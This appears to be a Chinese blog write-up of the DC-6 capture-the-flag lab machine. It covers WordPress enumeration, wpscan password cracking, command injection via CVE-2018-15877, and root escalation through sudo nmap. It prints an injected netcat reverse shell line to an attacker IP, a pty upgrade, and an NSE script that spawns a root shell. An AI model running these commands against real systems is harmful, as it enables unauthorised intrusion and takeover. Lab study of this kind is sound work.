DC-6(CVE-2018-15877漏洞+nmap提权)

于 2023-04-23 15:46:06 发布
阅读量183 收藏
点赞数
分类专栏: 打靶机 文章标签: 安全 服务器 网络 web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/JyajT/article/details/130323250
版权

信息收集

扫描靶机ip和端口

靶机ip为192.168.6.150,端口为80,22(有可能会用到ssh远程连接)

 扫描端口是否有什么信息,分别扫描80和22端口

 扫描目录在扫描端口的时候发现地址无法解析,所以需要加载hosts

 登录网站发现是wordpress框架因此可以用wpscan来进行扫描

扫描目录

 通过扫描目录看是否有什么可用信息,dirsearch -u http://192.168.6.150;得到了登录界面

 因为是wordpress,所以用可以用wpscan进行用户名的扫描,得到如下用户名

将用户名存在一个txt中,用kali自带的cewl生产密码字典cewl -w passwd.txt http://wordy,但是这里cewl的字典能力好像不够所以需要一个更强大的字典,根据提示cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt,用这个kali自带的字典。
 

输入命令获取密码:wpscan --url http://wordy -U users.txt -P passwd.txt,得到了一个用户名和密码mark,helpdesk01

漏洞扫描

 wpscan可以扫描插件漏洞,这里用searchsploit扫描网站版本没有可以用的漏洞,然后扫描activity monitor插件发现了一个html

 点进去看这个html的内容发现,在activity monitor的tool可能存在注入点,然后这个网站本身也可以直接抓包来改包按照下图的方式

 把aaa随便开个东西然后用关系符后面跟反弹shell的命令

反弹shell

  1. aaa|nc -e /bin/sh 192.168.6.128 4444;python -c 'import pty;pty.spawn("/bin/bash")'
  2. 翻找了半天在stuff中发现了graham的密码,接下来使用ssh远程

  1. 看到里面有个压缩包想到的应该是打开它,但是执行不了vim文件,如果想写入东西可以考虑用echo

  1. echo '/bin/bash' >> backups.sh;这个命令可以赋予权限
  2. sudo -u jens ./backups.sh #-u用户以jens的身份来执行脚本
  3. 查看jens的权限,可以免密打开下图的文件

提权

  1. echo 'os.execute("/bin/bash")'>get_shell.nse;利用nmap提权写一个执行文件让nmap来执行
  2. sudo nmap --script=/home/jens/get_shell.nse;执行脚本

总结

常见的命令连接符有(|,&&,||这三个连接符都是Windows系统与Linux系统共有的,而&是Windows系统特有,;是Linux系统特有的)

A|B:无论执行的A命令是否正确,B命令都执行

A&&B:只有在A命令成功执行的前提下,B命令才可以执行

A||B:只有在A命令没有执行失败的前提下,B命令才可以执行

A&B:不管A是否执行成功,B命令都会执行

A;B:不管A是否执行成功,B命令都会执行

  1. 这里用到了nmap提权
  2. 关于找漏洞可以根据框架来进行搜索
  3. 当vim无法编辑文件的时候可以利用echo将命令写入文件
JyajT
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
墨者学院-WordPress 远程命令执行漏洞(CVE-2018-15877)复现
JimWu的博客
09-05 1265
WordPress 远程命令执行漏洞(CVE-2018-15877)复现 难易程度:★★ 题目类型:CMS漏洞 使用工具:FireFox浏览器、burpsuite 1.打开靶场,找到登录,点击进去。 2.尝试弱口令登录,都失败了,知道账号为admin。 没有验证码,打开burpsuite,尝试暴力破解。 3.得到密码为123qwe。 4.该漏洞为Activity Monitor插件远程命令执行漏...
DC-6靶机CVE-2018-15877漏洞利用+nmap提权
m0_63028223的博客
11-26 852
CVE-2018-15877漏洞利用+nmap提权
WordPress 远程命令执行漏洞(CVE-2018-15877)复现 -墨者学院
小白鸽
07-31 1927
01 背景介绍 近日,WordPress 插件Plainview Activity Monitor被曝出存在一个远程命令执行漏洞。Plainview Activity Monitor 是一款网站用户活动监控插件。 远程攻击者可以通过构造的url来诱导wordpress管理员来点击恶意链接最终导致远程命令执行。 02 影响范围 Plainview Activity Monitor plugin version <= 20161228 03 利用方式 默认后台 wp-login.php Activity
墨者靶场 初级:WordPress 远程命令执行漏洞CVE-2018-15877)复现
qq_43233085的博客
01-21 1420
墨者靶场 初级:WordPress 远程命令执行漏洞CVE-2018-15877)复现题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 fck编辑器利用。 实训目标 1、学会利用搜索引擎寻找通用程序组件的漏洞利用方式。 2、了解一句话木马的使用。 3、了解burp的基本使用。 4、学会利用iis解析漏洞。 解题方向 根据题目提示,进行网站测试。 解题步骤 启动靶机,访问链接。 使用御剑扫...
CVE-2018-8120 Microsoft Windows提权漏洞 Exp_64
06-10
CVE-2018-8120 Microsoft Windows提权漏洞 Exp_32 该资源适用于64位windows操作系统
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
CVE-2018-8120 Microsoft Windows提权漏洞 Exp_32
06-10
CVE-2018-8120 Microsoft Windows提权漏洞 Exp_32 请注意该资源适用于32位操作系统
远程执行代码漏洞(CVE-2018-0886)漏洞修复
最新发布
08-21
**远程执行代码漏洞(CVE-2018-0886)详解及修复** 远程执行代码漏洞(Remote Code Execution,RCE)是网络安全领域的一个重要话题,它指的是攻击者利用软件中的漏洞,在未经用户授权的情况下,能够在目标系统上执行...
nmap提权几种方式
zijiaijd的博客
05-22 3584
第一个: 就是低版本可以用那个交互式 find / -perm -u=s -type f 2>/dev/null 查询可以用得suid nmap老版本支持“interactive.”选项,用户能够通过该选项执行shell命令 /usr/local/bin/nmap --interactive nmap --interactive即可得到交互式shell nmap> 之后输入!sh 才可以 要求: nmap有s标志位 nmap版本足够老 第二个: nmap以root运行 cat os.execut
系统漏洞利用与提权
panda.
06-21 1419
1、使用nmap扫描靶机系统,将靶机开放的端口号按从小到大的顺序作为FLAG(形式:[端口1,端口2…,端口n])提交;2、通过上述端口访问靶机系统,使用弱口令进行登录,将正确的用户名和密码作为FLAG(形式:[用户名,密码])提交;3、利用Kali渗透机生成反弹木马,将生成木马命令执行后提示的第四行的首个单词作为FLAG(形式:[单词])提交;4、对上述木马文件进行修改后上传到靶机系统中,使用MSF开启监听,将获得的当前权限的用户名作为FLAG(形式:[用户名])提交;......
( CVE-2018-15877 ) WordPress 远程命令执行漏洞复现
weixin_45253622的博客
03-05 626
WordPress 远程命令执行漏洞(CVE-2018-15877)复现 靶场环境传送门 打开靶场 找到登录界面 弱口令进入发现 用户名为admin,进行爆破 密码为123qwe 登录后台发现 该漏洞为Activity Monitor插件远程命令执行漏洞,所以我们登录后台,找到activity monitor,选择tools,输入127.0.0.1|ls /,查看文件。发现key.txt 返回页面,输入127.0.0.1|cat /key.txt,发现长度不够,按F12修改最大长度为150。
一文吃透Linux提权
weixin_45727359的博客
11-07 2433
来自公众号:FreeBuf作者:dnsill0x001 linux提权描述大多数计算机系统设计为可与多个用户一起使用。特权是指允许用户执行的操作。普通特权包括查看和编辑文件或修改系统文件...
CVE-2018-11686本地复现与分析
Au
03-19 1545
简介 FlexPaper<= 2.3.6 (web版)中存在RCE(远程代码执行),构造恶意的payload执行系统命令。 FlexPaper FlexPaper是一个开源轻量级的在浏览器上显示各种文档的组件,被设计用来与PDF2SWF一起使用, 使在Flex中显示PDF成为可能,而这个过程并无需PDF软件环境的支持。它可以被当做Flex的库来使用-------...
phpMyAdmin 4.8.1 远程文件包含漏洞CVE-2018-12613)
网络安全。
01-18 1914
0x01 简介 phpMyadmin 4.8.1版本的index.php中存在文件包含漏洞,通过二次编码可绕过过滤。 0x02 漏洞复现 1.将?进行两次URL编码为&quot;%253f&quot;,构造下列payload: http://xxx:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd 漏洞存在。 2.在S...
dedecms 5.7 download.php 代码执行漏洞,Dedecms V5.7后台任意代码执行[CVE-2018-7700] [高危漏洞][官方未修复]...
weixin_36410316的博客
04-02 740
漏洞的前提是登陆了后台,所以要不要修复大家看着办吧!该漏洞的触发点为/dede/tag_test_action.php。起因是csrf_check()的绕过,导致可执行任意代码。查看/dede/tag_test_action.php文件的源码:如果直接访问这个文件,会进入csrf_check()函数。提示token错误,且退出执行。跟进csrf_check(),该函数所在文件为dede/conf...
【墨者学院 】uWSGI 漏洞复现(CVE-2018-7490)
热门推荐
Summer's blog
05-13 1万+
0x01 漏洞详情 uWSGI是一款Web应用程序服务器,它实现了WSGI、uwsgi和http等协议。 uWSGI 2.0.17之前版本中存在路径遍历漏洞,该漏洞源于程序没有正确的处理DOCUMENT_ROOT检测。攻击者可通过发送带有‘…’序列的特制URL请求利用该漏洞查看系统上的任意文件。 uWSGI 2.0.17之前版本中存在路径遍历漏洞,该漏洞源于程序没有正确的处理DOCUMENT_RO...
WordPress插件Mailpress高危远程命令执行漏洞
10-08 389
漏洞描述: Mailpress是一个比较流行的WordPress邮件插件,由于存在越权调用,在不登陆的情况下,可以调用系统某些方法,造成远程命令执行。 影响版本:所有版本,当前最新版本5.4.3 漏洞等级:高危 修复建议: 1、建议停用此插件。 2、添加网站至云观测,及时了解网站组件突发/0day漏洞。(来源:东方联盟郭盛华博客) ...
Linux kernel(CVE-2018-17182)提权漏洞复现
06-12
CVE-2018-17182是Linux内核中的一种提权漏洞,攻击者可以利用该漏洞以root权限在系统中执行任意代码。这个漏洞的原因是一个名为"Race Condition"(竞争条件)的问题,通过在内核中利用这个问题,攻击者可以覆盖内核...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值